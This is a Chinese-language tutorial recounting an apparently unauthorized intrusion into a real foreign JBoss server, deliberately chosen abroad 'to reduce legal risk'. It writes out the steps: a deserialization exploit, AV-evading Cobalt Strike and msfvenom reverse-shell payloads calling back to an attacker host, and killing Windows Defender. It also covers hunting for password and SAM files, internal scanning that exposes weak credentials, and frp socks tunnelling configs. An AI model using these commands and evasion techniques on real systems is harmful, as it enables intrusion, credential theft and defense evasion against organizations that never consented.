内网横向渗透与免杀对抗实战教学文档

1. 外网打点与初始访问

1.1 目标发现与漏洞利用

1. 目标选择：选择国外站点进行练习，降低法律风险

2. 漏洞发现：

   • 发现JBoss网站存在反序列化漏洞
   • 使用jexboss工具尝试利用失败：python jexboss.py -u https://xx.xx.xx/
   • 改用"java反序列化终极测试工具"成功利用

3. 初始信息收集：

   whoami  # 查看当前用户
   ipconfig  # 查看IP地址
   tasklist /svc  # 查看进程和服务
   ping www.baidu.com  # 检查出网情况
   

4. 杀软检测：

   • 将进程列表粘贴到Windows杀软在线查询工具确认存在杀软

2. Cobalt Strike上线与免杀技术

2.1 免杀马生成与上传

1. 免杀方案选择：

   • 使用潮汐shellcode免杀工具（体积小，上传快）
   • 避免使用Python打包的exe（体积过大）

2. 操作步骤：

   • CS生成C语言格式的shellcode
   • 将shellcode复制到潮汐网站生成免杀exe
   • 上传并执行：

     C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide
     

3. 权限提升与信息收集

3.1 系统信息收集

1. 基础信息收集：

   whoami /priv  # 查看用户特权
   systeminfo  # 系统详细信息
   netstat -ano  # 网络连接和端口
   ipconfig /all  # 详细网络配置
   arp -a  # ARP表
   

2. 域环境确认：

   • 通过systeminfo确认存在域环境（ame.local）

3.2 提权尝试

1. CS自带插件提权：

   • 尝试失败，提权进程被杀软发现

2. 杀软进程终止：

   tskill MsMpEng  # 结束杀软进程
   tasklist /svc  # 确认进程已结束
   

3. Windows-Exploit-Suggester：

   python2 -m pip install --user xlrd==1.1.0
   python2 windows-exploit-suggester.py --update
   python2 ./windows-exploit-suggester.py --database 2023-02-06-mssb.xls --systeminfo systeminfo.txt
   

   • 上传exp测试均失败

4. PEASS-ng尝试：

   • 上传winPEASany.exe被杀软拦截

3.3 敏感信息收集

1. 密码文件位置：

   • SYSTEM文件：C:\Windows\System32\config\SYSTEM
   • SAM文件：C:\Windows\System32\config\SAM

2. 文件搜索技巧：

   dir %APPDATA%\Microsoft\Windows\Recent  # 最近文档
   findstr /si password config.* *.ini *.txt *.properties  # 搜索密码
   dir /a /s /b "*conf*" > 1.txt  # 搜索配置文件
   for /r 目录 %i in (account.docx,pwd.docx,login.docx,login*.xls) do @echo %i >> C:\tmp\123.txt
   

3. PrintSpoofer提权：

   PrintSpoofer.exe -i -c cmd  # 尝试失败
   

4. 横向渗透

4.1 fscan扫描

1. 扫描命令：

   "C:/Users/appusr/fscan64.exe" -h 172.16.2.1/24
   

2. 扫描结果分析：

   • 存活35个IP
   • 发现漏洞：
     • Postgres弱口令：172.16.2.200:5432 postgres/123456
     • MS17-010漏洞：172.16.2.5 (Windows Server 2003)
     • SSH弱口令：172.16.2.87:22 admin/admin

4.2 frp内网穿透

1. 服务端配置 (frps.ini)：

   [common]
   bind_addr = 0.0.0.0
   bind_port = 7080
   token = admin123
   dashboard_user = admin
   dashboard_pwd = admin123
   

2. 客户端配置 (frpc.ini)：

   [common]
   server_addr = xx.xx.xx.xx
   server_port = 7080
   token = admin123
   tls_enable=true
   pool_count=5
   
   [plugin_socks]
   type = tcp
   remote_port = 4566
   plugin = socks5
   plugin_user = admin
   plugin_passwd = admin123
   use_encryption = true
   use_compression = true
   

3. 执行与验证：

   shell "C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.exe -c C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.ini"
   

   • 使用FoxyProxy配置代理验证穿透成功

5. 免杀技术深入

5.1 潮汐在线免杀

1. 生成shellcode：

   msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c
   

2. 生成免杀马：

   • 将shellcode粘贴到潮汐网站生成exe

5.2 Ant-AntV免杀

1. 生成bin文件：

   msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=5555 -f raw -o 1.bin
   

2. 生成免杀马：

   python3 gen_trojan.py
   

5.3 CuiRi免杀

1. 生成shellcode：

   msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c
   

2. 生成免杀马：

   .\cuiri_win64.exe -f msf.txt
   

5.4 AniYa免杀

1. 生成免杀马：
   • 使用工具生成exe文件

6. 其他攻击路径尝试

6.1 Postgresql getshell

1. 连接尝试：
   • 使用Navicat连接Postgresql
   • 发现目标为CentOS系统，放弃此路径

6.2 VMware vSphere漏洞利用

1. 漏洞搜索：
   • Google搜索VMware vSphere RCE漏洞
   • 测试发现不存在可利用漏洞

7. 总结与经验

1. 技术总结：

   • 公开免杀工具已难以绕过现代杀软，需深入研究免杀技术
   • Kali Linux的proxychains在实战中存在问题，需进一步排查
   • fscan扫描出的内网目标未充分测试

2. 改进方向：

   • 加强免杀技术研究
   • 解决代理工具兼容性问题
   • 提高内网渗透的深度和广度

3. 工具列表：

   • Cobalt Strike 4.3
   • Windows杀软在线查询工具
   • fscan
   • 潮汐shellcode免杀
   • LSTAR
   • PEASS-ng
   • PrintSpoofer
   • frp
   • Metasploit
   • 多种免杀工具（Ant-AntV、CuiRi、AniYa等）

4. 关键命令速查：

   # 信息收集
   systeminfo
   netstat -ano
   ipconfig /all
   whoami /priv
   
   # 文件搜索
   findstr /si password *.config *.ini *.txt
   dir /a /s /b "*pass*" > results.txt
   
   # 横向移动
   fscan64.exe -h 172.16.2.1/24